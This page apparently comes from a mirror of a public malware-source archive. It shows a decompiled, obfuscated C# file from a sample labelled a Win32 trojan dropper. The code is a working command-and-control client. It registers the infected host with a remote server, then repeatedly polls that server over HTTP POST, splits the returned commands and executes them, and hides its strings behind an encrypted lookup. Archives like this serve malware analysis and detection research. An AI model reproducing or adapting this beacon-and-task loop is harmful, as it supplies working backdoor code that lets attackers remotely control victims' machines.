ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-22 11:26:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
71cdcf7dce
MalwareSourceCode/MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_000E/_0008.cs
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

150 lines
4.4 KiB
C#
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

// Decompiled with JetBrains decompiler
// Type: .
// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
using \u0001;
using \u0008;
using \u000E;
using System;
using System.IO;
using System.Net;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
namespace \u000E
{
internal sealed class \u0008 : \u0003
{
[NonSerialized]
internal new static \u0002 \u0001;
public static \u000E.\u0001 \u0001;
public void \u000F()
{
this.\u0010();
// ISSUE: method pointer
new Thread(new ThreadStart((object) this, __methodptr(\u0011))).Start();
}
public void \u000F([In] int obj0) => this.\u000F(\u000F.\u0001.\u0001.\u0006, \u000E.\u0008.\u0001(7872) + \u000F.\u0001.\u0001.\u0007.ToString() + \u000E.\u0008.\u0001(7889) + (object) obj0);
public void \u000F([In] string obj0, [In] string obj1) => this.\u000F(\u000F.\u0001.\u0001.\u0006, \u000E.\u0008.\u0001(7894) + obj0 + \u000E.\u0008.\u0001(7907) + obj1 + \u000E.\u0008.\u0001(7912) + \u000E.\u0008.\u0001.\u000E.ToString());
public void \u0010([In] string obj0) => this.\u000F(\u000F.\u0001.\u0001.\u0006, \u000E.\u0008.\u0001(7921) + \u000E.\u0008.\u0001.\u000E.ToString() + \u000E.\u0008.\u0001(7938) + obj0.ToString());
private void \u0010()
{
string str = \u000E.\u0008.\u0001(7947) + \u000F.\u0001.\u0001.\u0007 + \u000E.\u0008.\u0001(7964) + \u000F.\u0001.\u0001.\u000E + \u000E.\u0008.\u0001(7977) + \u000F.\u0001.\u0001.\u0005 + \u000E.\u0008.\u0001(7990) + \u000F.\u0001.\u0001.\u0008;
while (true)
{
try
{
this.\u000F(\u000F.\u0001.\u0001.\u0006, str);
break;
}
catch
{
}
Thread.Sleep(\u000F.\u0001.\u0001.\u0001 * 1000);
}
}
private void \u0011()
{
string str1 = \u000E.\u0008.\u0001(7999) + \u000F.\u0001.\u0001.\u0007;
while (true)
{
try
{
string str2 = this.\u000F(\u000F.\u0001.\u0001.\u0006, str1);
if (str2.Length > 0)
{
int num = 0;
try
{
foreach (char ch in str2)
{
if (ch.ToString() == \u000E.\u0008.\u0001(1797))
++num;
}
}
catch
{
}
for (int index = 0; index < num; ++index)
{
try
{
this.\u000F(str2.Split('~')[index].Replace(\u000E.\u0008.\u0001(1797), \u000E.\u0008.\u0001(1009)));
}
catch
{
}
}
}
else
{
try
{
\u0007.\u0008.\u0010();
}
catch
{
}
try
{
\u0002.\u0010();
}
catch
{
}
try
{
\u000F.\u0007.\u0010();
}
catch
{
}
try
{
\u0003.\u0010();
}
catch
{
}
}
}
catch
{
}
Thread.Sleep(\u000F.\u0001.\u0001.\u0001 * 1000);
}
}
private string \u000F([In] string obj0, [In] string obj1)
{
ServicePointManager.Expect100Continue = false;
HttpWebRequest httpWebRequest = (HttpWebRequest) WebRequest.Create(obj0);
httpWebRequest.ContentType = \u000E.\u0008.\u0001(8016);
httpWebRequest.Method = \u000E.\u0008.\u0001(8061);
httpWebRequest.UserAgent = \u000F.\u0001.\u0001.\u0004;
byte[] bytes = Encoding.Default.GetBytes(obj1);
httpWebRequest.ContentLength = (long) bytes.Length;
Stream requestStream = httpWebRequest.GetRequestStream();
requestStream.Write(bytes, 0, bytes.Length);
requestStream.Close();
WebResponse response = httpWebRequest.GetResponse();
return response == null ? string.Empty : new StreamReader(response.GetResponseStream()).ReadToEnd().Trim();
}
static \u0008()
{
\u0003.\u000F();
\u000E.\u0008.\u0001 = new \u000E.\u0001();
}
}
}
Reference in New Issue View Git Blame Copy Permalink